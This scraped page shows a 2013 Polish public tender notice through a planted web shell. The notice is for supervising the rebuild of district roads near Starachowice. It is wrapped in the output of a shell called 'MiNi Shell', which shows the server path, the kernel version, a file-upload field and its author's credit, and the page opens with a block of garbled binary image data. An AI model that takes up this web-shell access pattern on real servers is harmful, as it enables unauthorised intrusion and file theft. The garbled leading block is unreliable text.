JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130218/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130218/67324-N-2013.html

<p class="kh_header"><b>Starachowice: Pełnienie funkcji Inspektora Nadzoru przy realizacji przebudowy  dróg powiatowych: nr 0613 T Starachowice - Adamów - Styków - Jabłonna - Dąbrowa - Pawłów  oraz  nr 0628 T  Dąbrowa - Kałków w zakresie poprawy parametrów bezpieczeństwa ruchu drogowego i pieszego - etap III</b><br>
<b>Numer ogłoszenia: 67324 - 2013; data zamieszczenia: 18.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Powiatowych w Starachowicach , ul. Ostrowiecka 15, 27-200 Starachowice, woj. świętokrzyskie, tel. (041) 273 19 72-73, faks (041) 273 19 74.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdp-starachowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji Inspektora Nadzoru przy realizacji przebudowy  dróg powiatowych: nr 0613 T Starachowice - Adamów - Styków - Jabłonna - Dąbrowa - Pawłów  oraz  nr 0628 T  Dąbrowa - Kałków w zakresie poprawy parametrów bezpieczeństwa ruchu drogowego i pieszego - etap III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przebudowa  obejmuje odcinek drogi 0613 T o długości  1100 mb. 
Zakres robót budowlanych:
          - roboty rozbiórkowe, ziemne
          - frezowanie nawierzchni bitumicznej - 320 m2
          - podbudowa zasadnicza  z mieszanki MCE - 6809 m2
          - nawierzchnia z mieszanki mineralno-asfaltowej  - 6915 m2
          - przepusty rurowe  fi 50 - 76 mb
          - przepusty rurowe fi 60 - 50 mb
          - chodnik z kostki brukowej betonowej wraz ze zjazdami w ciągu chodnika - 2327 m2
          - umocnienie skarp i dna rowu elementami ażurowymi - 430 m2
          - wykonanie zatoki autobusowej - 1 szt
          - oświetlenie uliczne na długości 850 mb
          - pobocza z destruktu - 1547 m2
          - ustawienie znaków aktywnych zasilanych bateriami słonecznymi  D6  - 2 szt.
          - oznakowanie poziome - 172 m2

Szczegółowy opis przedmiotu zamówienia zawiera załączona do postępowania przetargowego dokumentacja projektowa.

Obowiązki Inspektora Nadzoru.
1. Wykonawca pełniąc czynności Inspektora Nadzoru (robót drogowych i robót elektrycznych) 
     będzie działać w imieniu i na rzecz Zamawiającego  zgodnie z obowiązującymi przepisami 
     Prawa  Budowlanego, Ustawy Prawo Zamówień Publicznych, warunkami określonymi 
     w umowie z Wykonawcą robót.
     Inspektor nadzoru  nie ma upoważnienia do zwolnienia wykonawcy robót  z jakichkolwiek 
     jego zobowiązań wynikających z umowy o roboty budowlane. Nie może także powierzyć 
     wykonywania robót innym wykonawcom      
2.Sprawowanie nadzoru inwestorskiego  na realizacją robót :
    2.1.  udział w  przekazaniu terenu budowy
    2.2. reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej 
             realizacji z projektem, przepisami i obowiązującymi normami oraz zasadami 
             wiedzy   technicznej,
    2.3.  sprawdzanie zgodności robót z dokumentacją projektową - projektami wykonawczymi, 
             specyfikacjami technicznymi, przepisami techniczno - budowlanymi, normami 
             i przepisami  BHP.
    2.4.   bieżąca kontrola zgodności  wykonywanych prac z harmonogramem robót
    2.5. podejmowanie decyzji o dopuszczeniu do stosowania (lub odrzuceniu) receptur, 
             materiałów, prefabrykatów, w tym mieszanek mineralno - bitumicznych, betonów do
             wszystkich elementów, sprzętu i urządzeń przewidzianych do realizacji robót w oparciu 
            o przepisy normy i wymagania sformułowane w umowie z Wykonawcą, w dokumentacji 
            projektowej i Specyfikacjach Technicznych;
    2.6. zatwierdzanie materiałów, technologii budowlanych oraz jakości wykonania zgodnie 
           z warunkami kontraktów i dokumentacją projektową dla wszystkich asortymentów robót
    2.7. sprawdzanie jakości wykonywanych robót, wbudowanych wyrobów budowlanych, 
            a w szczególności zapobieganie zastosowania wyrobów budowlanych wadliwych i nie 
            dopuszczonych  do obrotu i stosowania w budownictwie, kontrola i archiwizacja 
            dokumentów potwierdzających dopuszczenie  tych materiałów do obrotu. 
    2.8.  sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub znikających.
    2.9. potwierdzanie faktycznie wykonanych robót oraz usunięcia wad, a także, na żądanie 
            inwestora kontrolowanie rozliczeń budowy,
    2.10. wydawanie kierownikowi budowy lub kierownikowi robót poleceń potwierdzonych 
             wpisem do dziennika budowy dotyczących: usunięcia nieprawidłowości lub zagrożeń, 
             wykonania   prób lub badań, także wymagających odkrycia robót lub elementów 
             zakrytych oraz przedstawienie ekspertyz dotyczących prowadzonych robót
             budowlanych, dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów 
             budowlanych oraz urządzeń  technicznych,
    2.11. żądanie od kierownika budowy lub kierownika robót dokonania poprawek bądź 
              ponownego wykonania wadliwie wykonanych robót.
    2.12.  kontrolowanie  ilości i  terminowości wykonywania robót:
              a. kontrolowanie prawidłowości prowadzenia dziennika budowy i dokonywanie w nim
                  wpisów stwierdzających wszystkie okoliczności mające znaczenie dla oceny
                  właściwego wykonania robót,
              b. uczestniczenie w dokonywaniu  odbiorów częściowych  inwestycji,
              c. przygotowanie  zadania inwestycyjnego  do odbioru końcowego - sprawdzenie 
                   i zatwierdzenie dokumentacji powykonawczej (operatu kolaudacyjnego), w tym
                   powykonawczej dokumentacji geodezyjnej,
              d. sprawdzanie faktur wykonawcy oraz dokumentów załączonych do rozliczenia robót
               (inwestycji),   
    
3.  Inspektor nadzoru będzie zobowiązany do realizacji wszystkich innych czynności i zarządzeń 
     określonych przez Zamawiającego , które będą niezbędne do poprawnej  realizacji zadania 
      inwestycyjnego  i zabezpieczenia interesów Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 02.09.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> W przetargu nie jest wymagane wniesienie wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagania: 
                   a.  Osoba wskazana na stanowisko Inspektora Nadzoru robót drogowych  musi
                          posiadać uprawnienia  budowlane wymagane ustawą ustawa  z dnia 07 lipca 
                          1994r. - Prawo  budowlane do pełnienia samodzielnej  funkcji technicznej 
                          w budownictwie w zakresie kierowania robotami budowlanymi , specjalność 
                          drogowa lub odpowiadające im ważne uprawnienia budowlane wydane na 
                         podstawie wcześniej  obowiązujących przepisów oraz przynależeć do Regionalnej 
                         Izby Inżynierów Budownictwa. 

                b.   Osoba wskazana  na stanowisko Inspektora Nadzoru  robót elektrycznych
                    (oświetlenie uliczne) -musi posiadać  uprawnienia instalacyjne  w zakresie sieci, 
                      instalacji i urządzeń  elektrycznych  i elektroenergetycznych  (w zakresie 
                      obejmującym przedmiot zamówienia)   oraz  przynależeć do  Polskiej  Izby
                      Inżynierów Budownictwa.  (ustawa  z dnia  07lipca  1994r.-Prawo  budowlane).

Wykonawca może wykazać na stanowisko Inspektora nadzoru (robót drogowych i robót elektrycznych) osobę będącą obywatelem państwa członkowskiego, której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach ustawy z dnia  18.03.2008r - zasady uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej. 

Warunek zostanie spełniony, jeżeli wykonawca w wykazie  osób   wykaże na czas realizacji zamówienia  na stanowisko Inspektora Nadzoru robót drogowych i Inspektora Nadzoru robót elektrycznych  osoby posiadające  ww. uprawnienia  oraz załączy  oświadczenie  
o posiadaniu przez te osoby  wymaganych uprawnień.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo, jeżeli w imieniu Wykonawcy występuje pełnomocnik</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>a. Zamawiający dopuszcza możliwość przedłużenia terminu realizacji wykonania 
                      zamówienia w przypadku przedłużenia terminu realizacji umowy z Wykonawcą
                      robót  budowlanych w przypadku wystąpienia niezależnych od Wykonawcy robót 
                      budowlanych  okoliczności.
                 b. Zmiana osoby na  stanowisku Inspektora Nadzoru(robót drogowych, 
                       elektrycznych)  pod warunkiem, że wskazana osoba spełniać  będzie wymagania  
                       określone w specyfikacji  istotnych warunków  zamówienia,  
                 c. Przedłużenie terminu zakończenia realizacji umowy  w przypadku opóźnienia 
                      wykonania  robót budowlanych z winy Wykonawcy robót budowlanych.
                 d.  Zmian teleadresowych  Stron umowy określonych w umowie;
                 e.  Oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy;
                 f.   Zmiana osoby odpowiedzialnej za realizację zamówienia ze strony Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zdp-starachowice.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Powiatowych 
27-200 Starachowice
ul. Ostrowiecka 15.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.02.2013 godzina 11:00, miejsce: Zarząd Dróg Powiatowych 
27-200 Starachowice
ul. Ostrowiecka 15, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com